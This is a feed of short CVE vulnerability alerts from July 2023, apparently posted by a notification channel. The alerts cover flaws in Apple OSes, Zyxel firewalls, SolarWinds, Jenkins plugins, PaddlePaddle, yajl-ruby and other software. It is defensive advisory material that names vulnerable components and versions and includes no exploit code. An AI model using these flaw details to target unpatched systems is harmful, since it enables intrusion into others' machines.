🚨 CVE-2022-24795yajl-ruby is a C binding to the YAJL JSON parsing and generation library. The 1.x branch and the 2.x branch of `yajl` contain an integer overflow which leads to subsequent heap memory corruption when dealing with large (~2GB) inputs. The reallocation logic at `yajl_buf.c#L64` may result in the `need` 32bit integer wrapping to 0 when `need` approaches a value of 0x80000000 (i.e. ~2GB of data), which results in a reallocation of buf->alloc into a small heap chunk. These integers are declared as `size_t` in the 2.x branch of `yajl`, which practically prevents the issue from triggering on 64bit platforms, however this does not preclude this issue triggering on 32bit builds on which `size_t` is a 32bit integer. Subsequent population of this under-allocated heap chunk is based on the original buffer size, leading to heap memory corruption. This vulnerability mostly impacts process availability. Maintainers believe exploitation for arbitrary code execution is unlikely. A patch is available and anticipated to be part of yajl-ruby version 1.4.2. As a workaround, avoid passing large inputs to YAJL.🎖@cveNotify |
|
| 2023-07-27 10:58:13 |
🚨 CVE-2008-2383CRLF injection vulnerability in xterm allows user-assisted attackers to execute arbitrary commands via LF (aka \n) characters surrounding a command name within a Device Control Request Status String (DECRQSS) escape sequence in a text file, a related issue to CVE-2003-0063 and CVE-2003-0071.🎖@cveNotify |
|
| 2023-07-27 06:58:30 |
🚨 CVE-2023-38597The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5, Safari 16.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-07-27 06:58:29 |
🚨 CVE-2023-38606This issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Big Sur 11.7.9, macOS Ventura 13.5, watchOS 9.6. An app may be able to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1.🎖@cveNotify |
|
| 2023-07-27 06:58:28 |
🚨 CVE-2023-32393The issue was addressed with improved memory handling. This issue is fixed in watchOS 9.3, tvOS 16.3, macOS Ventura 13.2, iOS 16.3 and iPadOS 16.3. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-07-27 06:58:27 |
🚨 CVE-2023-32416A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5, watchOS 9.6. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-07-27 06:58:24 |
🚨 CVE-2023-32418The issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.6.8, macOS Ventura 13.5, macOS Big Sur 11.7.9. Processing a file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-07-27 06:58:23 |
🚨 CVE-2023-32441The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Big Sur 11.7.9, macOS Ventura 13.5, watchOS 9.6. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-27 06:58:22 |
🚨 CVE-2023-32443An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.8, macOS Ventura 13.5, macOS Big Sur 11.7.9. Processing a file may lead to a denial-of-service or potentially disclose memory contents.🎖@cveNotify |
|
| 2023-07-27 06:58:18 |
🚨 CVE-2023-35993A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.6.8, iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Big Sur 11.7.9, macOS Ventura 13.5, watchOS 9.6. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-07-27 06:58:17 |
🚨 CVE-2023-38258The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory.🎖@cveNotify |
|
| 2023-07-27 06:58:16 |
🚨 CVE-2023-38259A logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.6.8, macOS Ventura 13.5, macOS Big Sur 11.7.9. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2023-07-27 06:58:13 |
🚨 CVE-2023-38421The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.5, macOS Monterey 12.6.8. Processing a 3D model may result in disclosure of process memory.🎖@cveNotify |
|
| 2023-07-27 06:58:12 |
🚨 CVE-2023-38565A path handling issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.6.8, iOS 16.6 and iPadOS 16.6, macOS Big Sur 11.7.9, macOS Ventura 13.5, watchOS 9.6. An app may be able to gain root privileges.🎖@cveNotify |
|
| 2023-07-27 06:58:11 |
🚨 CVE-2023-38572The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. A website may be able to bypass Same Origin Policy.🎖@cveNotify |
|
| 2023-07-26 22:58:40 |
🚨 CVE-2023-37732Yasm v1.3.0.78 was found prone to NULL Pointer Dereference in /libyasm/intnum.c and /elf/elf.c, which allows the attacker to cause a denial of service via a crafted file.🎖@cveNotify |
|
| 2023-07-26 22:58:39 |
🚨 CVE-2023-38285Trustwave ModSecurity 3.x before 3.0.10 has Inefficient Algorithmic Complexity.🎖@cveNotify |
|
| 2023-07-26 22:58:38 |
🚨 CVE-2023-38349PNP4Nagios through 81ebfc5 lacks CSRF protection in the AJAX controller. This affects 0.6.26.🎖@cveNotify |
|
| 2023-07-26 22:58:37 |
🚨 CVE-2023-38350PNP4Nagios through 81ebfc5 has stored XSS in the AJAX controller via the basket API and filters. This affects 0.6.26.🎖@cveNotify |
|
| 2023-07-26 22:58:36 |
🚨 CVE-2023-35802IQ Engine before 10.6r1 on Extreme Network AP devices has a Buffer Overflow in the implementation of the CAPWAP protocol that may be exploited to obtain elevated privileges to conduct remote code execution. Access to the internal management interface/subnet is required to conduct the exploit.🎖@cveNotify |
|
| 2023-07-26 22:58:31 |
🚨 CVE-2023-37794WAYOS FBM-291W 19.09.11V was discovered to contain a command injection vulnerability via the component /upgrade_filter.asp.🎖@cveNotify |
|
| 2023-07-26 22:58:30 |
🚨 CVE-2023-3613Mattermost WelcomeBot plugin fails to to validate the membership status when inviting or adding users to channels allowing guest accounts to be added or invited to channels by default. 🎖@cveNotify |
|
| 2023-07-26 22:58:29 |
🚨 CVE-2023-3614Mattermost fails to properly validate a gif image file, allowing an attacker to consume a significant amount of server resources, making the server unresponsive for an extended period of time by linking to specially crafted image file.🎖@cveNotify |
|
| 2023-07-26 22:58:28 |
🚨 CVE-2023-3615Mattermost iOS app fails to properly validate the server certificate while initializing the TLS connection allowing a network attacker to intercept the WebSockets connection.🎖@cveNotify |
|
| 2023-07-26 22:58:24 |
🚨 CVE-2021-37386Furukawa 423-41W/AC before v1.1.4 and LD421-21W before v1.3.3 were discovered to contain an HTML injection vulnerability via the serial number update function.🎖@cveNotify |
|
| 2023-07-26 22:58:23 |
🚨 CVE-2023-28767The configuration parser fails to sanitize user-controlled input in the Zyxel ATP series firmware versions 5.10 through 5.36, USG FLEX series firmware versions 5.00 through 5.36, USG FLEX 50(W) series firmware versions 5.10 through 5.36, USG20(W)-VPN series firmware versions 5.10 through 5.36, and VPN series firmware versions 5.00 through 5.36. An unauthenticated, LAN-based attacker could leverage the vulnerability to inject some operating system (OS) commands into the device configuration data on an affected device when the cloud management mode is enabled.🎖@cveNotify |
|
| 2023-07-26 22:58:22 |
🚨 CVE-2023-33012A command injection vulnerability in the configuration parser of the Zyxel ATP series firmware versions 5.10 through 5.36 Patch 2, USG FLEX series firmware versions 5.00 through 5.36 Patch 2, USG FLEX 50(W) series firmware versions 5.10 through 5.36 Patch 2, USG20(W)-VPN series firmware versions 5.10 through 5.36 Patch 2, and VPN series firmware versions 5.00 through 5.36 Patch 2, could allow an unauthenticated, LAN-based attacker to execute some OS commands by using a crafted GRE configuration when the cloud management mode is enabled.🎖@cveNotify |
|
| 2023-07-26 22:58:21 |
🚨 CVE-2023-34138A command injection vulnerability in the hotspot management feature of the Zyxel ATP series firmware versions 4.60 through 5.36 Patch 2, USG FLEX series firmware versions 4.60 through 5.36 Patch 2, USG FLEX 50(W) series firmware versions 4.60 through 5.36 Patch 2, USG20(W)-VPN series firmware versions 4.60 through 5.36 Patch 2, and VPN series firmware versions 4.60 through 5.36 Patch 2, could allow an unauthenticated, LAN-based attacker to execute some OS commands on an affected device if the attacker could trick an authorized administrator to add their IP address to the list of trusted RADIUS clients in advance.🎖@cveNotify |
|
| 2023-07-26 22:58:17 |
🚨 CVE-2023-37475Hamba avro is a go lang encoder/decoder implementation of the avro codec specification. In affected versions a well-crafted string passed to avro's `github.com/hamba/avro/v2.Unmarshal()` can throw a `fatal error: runtime: out of memory` which is unrecoverable and can cause denial of service of the consumer of avro. The root cause of the issue is that avro uses part of the input to `Unmarshal()` to determine the size when creating a new slice and hence an attacker may consume arbitrary amounts of memory which in turn may cause the application to crash. This issue has been addressed in commit `b4a402f4` which has been included in release version `2.13.0`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-07-26 22:58:16 |
🚨 CVE-2023-34139A command injection vulnerability in the Free Time WiFi hotspot feature of the Zyxel USG FLEX series firmware versions 4.50 through 5.36 Patch 2 and VPN series firmware versions 4.20 through 5.36 Patch 2, could allow an unauthenticated, LAN-based attacker to execute some OS commands on an affected device.🎖@cveNotify |
|
| 2023-07-26 22:58:15 |
🚨 CVE-2022-30858An issue was discovered in ngiflib 0.4. There is SEGV in SDL_LoadAnimatedGif when use SDLaffgif. poc : ./SDLaffgif CA_file2_0🎖@cveNotify |
|
| 2023-07-26 22:58:14 |
🚨 CVE-2023-34140A buffer overflow vulnerability in the Zyxel ATP series firmware versions 4.32 through 5.36 Patch 2, USG FLEX series firmware versions 4.50 through 5.36 Patch 2, USG FLEX 50(W) series firmware versions 4.16 through 5.36 Patch 2, USG20(W)-VPN series firmware versions 4.16 through 5.36 Patch 2, VPN series firmware versions 4.30 through 5.36 Patch 2, NXC2500 firmware versions 6.10(AAIG.0) through 6.10(AAIG.3), and NXC5500 firmware versions 6.10(AAOS.0) through 6.10(AAOS.4), could allow an unauthenticated, LAN-based attacker to cause denial of service (DoS) conditions by sending a crafted request to the CAPWAP daemon.🎖@cveNotify |
|
| 2023-07-26 21:58:36 |
🚨 CVE-2023-23843The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-07-26 21:58:35 |
🚨 CVE-2023-23844The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.🎖@cveNotify |
|
| 2023-07-26 21:58:34 |
🚨 CVE-2023-26859SQL injection vulnerability found in PrestaShop sendinblue v.4.0.15 and before allow a remote attacker to gain privileges via the ajaxOrderTracking.php component.🎖@cveNotify |
|
| 2023-07-26 21:58:33 |
🚨 CVE-2023-26911ASUS SetupAsusServices v1.0.5.1 in Asus Armoury Crate v5.3.4.0 contains an unquoted service path vulnerability which allows local users to launch processes with elevated privileges.🎖@cveNotify |
|
| 2023-07-26 21:58:31 |
🚨 CVE-2023-33224The SolarWinds Platform was susceptible to the Incorrect Behavior Order Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with NETWORK SERVICE privileges.🎖@cveNotify |
|
| 2023-07-26 21:58:30 |
🚨 CVE-2023-33225The SolarWinds Platform was susceptible to the Incorrect Comparison Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands with SYSTEM privileges.🎖@cveNotify |
|
| 2023-07-26 21:58:29 |
🚨 CVE-2023-39151Jenkins 2.415 and earlier, LTS 2.401.2 and earlier does not sanitize or properly encode URLs in build logs when transforming them into hyperlinks, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control build log contents.🎖@cveNotify |
|
| 2023-07-26 21:58:27 |
🚨 CVE-2023-39152Always-incorrect control flow implementation in Jenkins Gradle Plugin 2.8 may result in credentials not being masked (i.e., replaced with asterisks) in the build log in some circumstances.🎖@cveNotify |
|
| 2023-07-26 21:58:26 |
🚨 CVE-2023-39153A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Authentication Plugin 1.17.1 and earlier allows attackers to trick users into logging in to the attacker's account.🎖@cveNotify |
|
| 2023-07-26 21:58:25 |
🚨 CVE-2023-39154Incorrect permission checks in Jenkins Qualys Web App Scanning Connector Plugin 2.0.10 and earlier allow attackers with global Item/Configure permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-07-26 21:58:24 |
🚨 CVE-2023-39155Jenkins Chef Identity Plugin 2.0.3 and earlier does not mask the user.pem key form field, increasing the potential for attackers to observe and capture it.🎖@cveNotify |
|
| 2023-07-26 21:58:22 |
🚨 CVE-2023-39156A cross-site request forgery (CSRF) vulnerability in Jenkins Bazaar Plugin 1.22 and earlier allows attackers to delete previously created Bazaar SCM tags.🎖@cveNotify |
|
| 2023-07-26 21:58:21 |
🚨 CVE-2023-23842The SolarWinds Network Configuration Manager was susceptible to the Directory Traversal Vulnerability. This vulnerability allows users with administrative access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2023-07-26 21:58:20 |
🚨 CVE-2023-33229The SolarWinds Platform was susceptible to the Incorrect Input Neutralization Vulnerability. This vulnerability allows a remote adversary with a valid SolarWinds Platform account to append URL parameters to inject passive HTML. 🎖@cveNotify |
|
| 2023-07-26 21:58:19 |
🚨 CVE-2023-33308A stack-based overflow vulnerability [CWE-124] in Fortinet FortiOS version 7.0.0 through 7.0.10 and 7.2.0 through 7.2.3 and FortiProxy version 7.0.0 through 7.0.9 and 7.2.0 through 7.2.2 allows a remote unauthenticated attacker to execute arbitrary code or command via crafted packets reaching proxy policies or firewall policies with proxy mode alongside deep or full packet inspection.🎖@cveNotify |
|
| 2023-07-26 21:58:17 |
🚨 CVE-2023-3622 Access Control Bypass Vulnerability in the SolarWinds Platform that allows an underprivileged user to read arbitrary resource 🎖@cveNotify |
|
| 2023-07-26 21:58:16 |
🚨 CVE-2023-37049emlog 2.1.9 is vulnerable to Arbitrary file deletion via admin\template.php.🎖@cveNotify |
|
| 2023-07-26 21:58:15 |
🚨 CVE-2023-39261In JetBrains IntelliJ IDEA before 2023.2 plugin for Space was requesting excessive permissions🎖@cveNotify |
|
| 2023-07-26 21:58:14 |
🚨 CVE-2023-2636The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber🎖@cveNotify |
|
| 2023-07-26 21:58:13 |
🚨 CVE-2023-2579The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-07-26 18:58:50 |
🚨 CVE-2023-35001Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace🎖@cveNotify |
|
| 2023-07-26 18:58:48 |
🚨 CVE-2023-35116** DISPUTED ** jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker.🎖@cveNotify |
|
| 2023-07-26 18:58:47 |
🚨 CVE-2023-20887Aria Operations for Networks contains a command injection vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution.🎖@cveNotify |
|
| 2023-07-26 18:58:46 |
🚨 CVE-2023-31436qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.🎖@cveNotify |
|
| 2023-07-26 18:58:44 |
🚨 CVE-2023-30456An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4.🎖@cveNotify |
|
| 2023-07-26 18:58:43 |
🚨 CVE-2023-1380A slab-out-of-bound read problem was found in brcmf_get_assoc_ies in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux Kernel. This issue could occur when assoc_info->req_len data is bigger than the size of the buffer, defined as WL_EXTRA_BUF_MAX, leading to a denial of service.🎖@cveNotify |
|
| 2023-07-26 18:58:42 |
🚨 CVE-2023-38253An out-of-bounds read flaw was found in w3m, in the growbuf_to_Str function in indep.c. This issue may allow an attacker to cause a denial of service through a crafted HTML file.🎖@cveNotify |
|
| 2023-07-26 18:58:41 |
🚨 CVE-2023-38252An out-of-bounds read flaw was found in w3m, in the Strnew_size function in Str.c. This issue may allow an attacker to cause a denial of service through a crafted HTML file.🎖@cveNotify |
|
| 2023-07-26 18:58:39 |
🚨 CVE-2023-36883Microsoft Edge for iOS Spoofing Vulnerability🎖@cveNotify |
|
| 2023-07-26 18:58:38 |
🚨 CVE-2023-36887Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-07-26 18:58:37 |
🚨 CVE-2023-36888Microsoft Edge for Android (Chromium-based) Tampering Vulnerability🎖@cveNotify |
|
| 2023-07-26 18:58:36 |
🚨 CVE-2023-37946Jenkins OpenShift Login Plugin 1.1.0.227.v27e08dfb_1a_20 and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-07-26 18:58:34 |
🚨 CVE-2023-3635GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.🎖@cveNotify |
|
| 2023-07-26 18:58:33 |
🚨 CVE-2023-26563The Syncfusion EJ2 Node File Provider 0102271 is vulnerable to filesystem-server.js directory traversal. As a result, an unauthenticated attacker can: - On Windows, list files in any directory, read any file, delete any file, upload any file to any directory accessible by the web server. - On Linux, read any file, download any directory, delete any file, upload any file to any directory accessible by the web server.🎖@cveNotify |
|
| 2023-07-26 18:58:32 |
🚨 CVE-2023-37649Incorrect access control in the component /models/Content of Cockpit CMS v2.5.2 allows unauthorized attackers to access sensitive data.🎖@cveNotify |
|
| 2023-07-26 18:58:31 |
🚨 CVE-2023-37650A Cross-Site Request Forgery (CSRF) in the Admin portal of Cockpit CMS v2.5.2 allows attackers to execute arbitrary Administrator commands.🎖@cveNotify |
|
| 2023-07-26 18:58:30 |
🚨 CVE-2023-35134Weintek Weincloud v0.13.6 could allow an attacker to reset a password with the corresponding account’s JWT token only.🎖@cveNotify |
|
| 2023-07-26 18:58:29 |
🚨 CVE-2023-37362Weintek Weincloud v0.13.6 could allow an attacker to abuse the registration functionality to login with testing credentials to the official website.🎖@cveNotify |
|
| 2023-07-26 18:58:28 |
🚨 CVE-2023-32657Weintek Weincloud v0.13.6 could allow an attacker to efficiently develop a brute force attack on credentials with authentication hints from error message responses.🎖@cveNotify |
|
| 2023-07-26 18:58:27 |
🚨 CVE-2023-34429Weintek Weincloud v0.13.6 could allow an attacker to cause a denial-of-service condition for Weincloud by sending a forged JWT token.🎖@cveNotify |
|
| 2023-07-26 16:58:21 |
🚨 CVE-2023-3486An authentication bypass exists in PaperCut NG versions 22.0.12 and prior that could allow a remote, unauthenticated attacker to upload arbitrary files to the PaperCut NG host’s file storage. This could exhaust system resources and prevent the service from operating as expected.🎖@cveNotify |
|
| 2023-07-26 16:58:19 |
🚨 CVE-2022-47758Nanoleaf firmware v7.1.1 and below is missing TLS verification, allowing attackers to execute arbitrary code via a DNS hijacking attack.🎖@cveNotify |
|
| 2023-07-26 16:58:18 |
🚨 CVE-2023-35692In getLocationCache of GeoLocation.java, there is a possible way to send a mock location during an emergency call due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-07-26 16:58:17 |
🚨 CVE-2023-36832An Improper Handling of Exceptional Conditions vulnerability in packet processing of Juniper Networks Junos OS on MX Series allows an unauthenticated network-based attacker to send specific packets to an Aggregated Multiservices (AMS) interface on the device, causing the packet forwarding engine (PFE) to crash, resulting in a Denial of Service (DoS). Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition.This issue is only triggered by packets destined to a local-interface via a service-interface (AMS). AMS is only supported on the MS-MPC, MS-MIC, and MX-SPC3 cards. This issue is not experienced on other types of interfaces or configurations. Additionally, transit traffic does not trigger this issue.This issue affects Juniper Networks Junos OS on MX Series:All versions prior to 19.1R3-S10;19.2 versions prior to 19.2R3-S7;19.3 versions prior to 19.3R3-S8;19.4 versions prior to 19.4R3-S12;20.2 versions prior to 20.2R3-S8;20.4 versions prior to 20.4R3-S7;21.1 versions prior to 21.1R3-S5;21.2 versions prior to 21.2R3-S5;21.3 versions prior to 21.3R3-S4;21.4 versions prior to 21.4R3-S3;22.1 versions prior to 22.1R3-S2;22.2 versions prior to 22.2R3;22.3 versions prior to 22.3R2-S1, 22.3R3;22.4 versions prior to 22.4R1-S2, 22.4R2.🎖@cveNotify |
|
| 2023-07-26 16:58:15 |
🚨 CVE-2023-36119File upload vulnerability in PHPGurukul Online Security Guards Hiring System v.1.0 allows a remote attacker to execute arbitrary code via a crafted php file to the \osghs\admin\images file.🎖@cveNotify |
|
| 2023-07-26 16:58:14 |
🚨 CVE-2023-36831An Improper Check or Handling of Exceptional Conditions vulnerability in the UTM (Unified Threat Management) Web-Filtering feature of Juniper Networks Junos OS on SRX Series causes a jbuf memory leak to occur when accessing certain websites, eventually leading to a Denial of Service (DoS) condition. Service restoration is only possible by rebooting the system.The jbuf memory leak only occurs in SSL Proxy and UTM Web-Filtering configurations. Other products, platforms, and configurations are not affected by this vulnerability.This issue affects Juniper Networks Junos OS on SRX Series:22.2 versions prior to 22.2R3;22.3 versions prior to 22.3R2-S1, 22.3R3;22.4 versions prior to 22.4R1-S2, 22.4R2.This issue does not affect Juniper Networks Junos OS versions prior to 22.2R2.🎖@cveNotify |
|
| 2023-07-26 14:58:17 |
🚨 CVE-2023-26564The Syncfusion EJ2 ASPCore File Provider 3ac357f is vulnerable to Models/PhysicalFileProvider.cs directory traversal. As a result, an unauthenticated attacker can list files within a directory, download any file, or upload any file to any directory accessible by the web server.🎖@cveNotify |
|
| 2023-07-26 14:58:13 |
🚨 CVE-2023-39261In JetBrains IntelliJ IDEA before 2023.2 plugin for Space was requesting excessive permissions🎖@cveNotify |
|
| 2023-07-26 14:58:12 |
🚨 CVE-2023-38673PaddlePaddle before 2.5.0 has a command injection in fs.py. This resulted in the ability to execute arbitrary commands on the operating system.🎖@cveNotify |
|
| 2023-07-26 14:58:11 |
🚨 CVE-2023-38669Use after free in paddle.diagonal in PaddlePaddle before 2.5.0. This resulted in a potentially exploitable condition.🎖@cveNotify |
|
| 2023-07-26 12:58:39 |
🚨 CVE-2023-38670Null pointer dereference in paddle.flip in PaddlePaddle before 2.5.0. This resulted in a runtime crash and denial of service.🎖@cveNotify |
|
| 2023-07-26 12:58:37 |
🚨 CVE-2023-38671Heap buffer overflow in paddle.trace in PaddlePaddle before 2.5.0. This flaw can lead to a denial of service, information disclosure, or more damage is possible.🎖@cveNotify |
|
| 2023-07-26 12:58:36 |
🚨 CVE-2023-38669Use after free in paddle.diagonal in PaddlePaddle before 2.5.0. This resulted in a potentially exploitable condition.🎖@cveNotify |
|
| 2023-07-26 12:58:35 |
🚨 CVE-2023-2958Authorization Bypass Through User-Controlled Key vulnerability in Origin Software ATS Pro allows Authentication Abuse, Authentication Bypass.This issue affects ATS Pro: before 20230714.🎖@cveNotify |
|
| 2023-07-26 12:58:33 |
🚨 CVE-2023-1547Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Elra Parkmatik allows SQL Injection through SOAP Parameter Tampering, Command Line Execution through SQL Injection.This issue affects Parkmatik: before 02.01-a51.🎖@cveNotify |
|
| 2023-07-26 12:58:32 |
🚨 CVE-2023-35069Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Bullwark allows Path Traversal.This issue affects Bullwark: before BLW-2016E-960H.🎖@cveNotify |
|
| 2023-07-26 12:58:31 |
🚨 CVE-2023-3319Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iDisplay PlatPlay DS allows Stored XSS.This issue affects PlatPlay DS: before 3.14.🎖@cveNotify |
|
| 2023-07-26 12:58:30 |
🚨 CVE-2023-3048Authorization Bypass Through User-Controlled Key vulnerability in TMT Lockcell allows Authentication Abuse, Authentication Bypass.This issue affects Lockcell: before 15.🎖@cveNotify |
|
| 2023-07-26 12:58:29 |
🚨 CVE-2023-3049Unrestricted Upload of File with Dangerous Type vulnerability in TMT Lockcell allows Command Injection.This issue affects Lockcell: before 15.🎖@cveNotify |
|
| 2023-07-26 12:58:28 |
🚨 CVE-2023-2851** UNSUPPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AGT Tech Ceppatron allows Command Line Execution through SQL Injection, SQL Injection.This issue affects all versions of the sofware also EOS when CVE-ID assigned.🎖@cveNotify |
|
| 2023-07-26 12:58:24 |
🚨 CVE-2023-2882Generation of Incorrect Security Tokens vulnerability in CBOT Chatbot allows Token Impersonation, Privilege Abuse.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-07-26 12:58:23 |
🚨 CVE-2023-2884Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG), Use of Insufficiently Random Values vulnerability in CBOT Chatbot allows Signature Spoofing by Key Recreation.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-07-26 12:58:22 |
🚨 CVE-2023-2885Channel Accessible by Non-Endpoint vulnerability in CBOT Chatbot allows Adversary in the Middle (AiTM).This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-07-26 12:58:21 |
🚨 CVE-2023-2886Missing Origin Validation in WebSockets vulnerability in CBOT Chatbot allows Content Spoofing Via Application API Manipulation.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-07-26 12:58:20 |
🚨 CVE-2023-2887Authentication Bypass by Spoofing vulnerability in CBOT Chatbot allows Authentication Bypass.This issue affects Chatbot: before Core: v4.0.3.4 Panel: v4.0.3.7.🎖@cveNotify |
|
| 2023-07-26 12:58:16 |
🚨 CVE-2023-2703Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Finex Media Competition Management System allows Retrieve Embedded Sensitive Data, Collect Data as Provided by Users.This issue affects Competition Management System: before 23.07.🎖@cveNotify |
|
| 2023-07-26 12:58:15 |
🚨 CVE-2023-2713Authorization Bypass Through User-Controlled Key vulnerability in "Rental Module" developed by third-party for Ideasoft's E-commerce Platform allows Authentication Abuse, Authentication Bypass.This issue affects Rental Module: before 23.05.15.🎖@cveNotify |
|
| 2023-07-26 12:58:14 |
🚨 CVE-2023-1803Authentication Bypass by Alternate Name vulnerability in DTS Electronics Redline Router firmware allows Authentication Bypass.This issue affects Redline Router: before 7.17.🎖@cveNotify |
|
| 2023-07-26 12:58:13 |
🚨 CVE-2023-1833Authentication Bypass by Primary Weakness vulnerability in DTS Electronics Redline Router firmware allows Authentication Bypass.This issue affects Redline Router: before 7.17.🎖@cveNotify |
|
| 2023-07-26 11:58:26 |
🚨 CVE-2023-34434Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0. The attacker could bypass the current logic and achieve arbitrary file reading. To solve it, users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick https://github.com/apache/inlong/pull/8130 .🎖@cveNotify |
|
| 2023-07-26 11:58:24 |
🚨 CVE-2023-35088Improper Neutralization of Special Elements Used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0. In the toAuditCkSql method, the groupId, streamId, auditId, and dt are directly concatenated into the SQL query statement, which may lead to SQL injection attacks.Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/8198 🎖@cveNotify |
|
| 2023-07-26 11:58:23 |
🚨 CVE-2023-20593An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.🎖@cveNotify |
|
| 2023-07-26 11:58:22 |
🚨 CVE-2023-38334Omnis Studio 10.22.00 has incorrect access control. It advertises an irreversible feature for locking classes within Omnis libraries: it should be no longer possible to delete, view, change, copy, rename, duplicate, or print a locked class. Due to implementation issues, locked classes in Omnis libraries can be unlocked, and thus further analyzed and modified by Omnis Studio. This allows for further analyzing and also deleting, viewing, changing, copying, renaming, duplicating, or printing previously locked Omnis classes. This violates the expected behavior of an "irreversible operation."🎖@cveNotify |
|
| 2023-07-26 11:58:21 |
🚨 CVE-2023-38335Omnis Studio 10.22.00 has incorrect access control. It advertises a feature for making Omnis libraries "always private" - this is supposed to be an irreversible operation. However, due to implementation issues, "always private" Omnis libraries can be opened by the Omnis Studio browser by bypassing specific checks. This violates the expected behavior of an "irreversible operation".🎖@cveNotify |
|
| 2023-07-26 11:58:20 |
🚨 CVE-2023-32046Windows MSHTML Platform Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-07-26 11:58:18 |
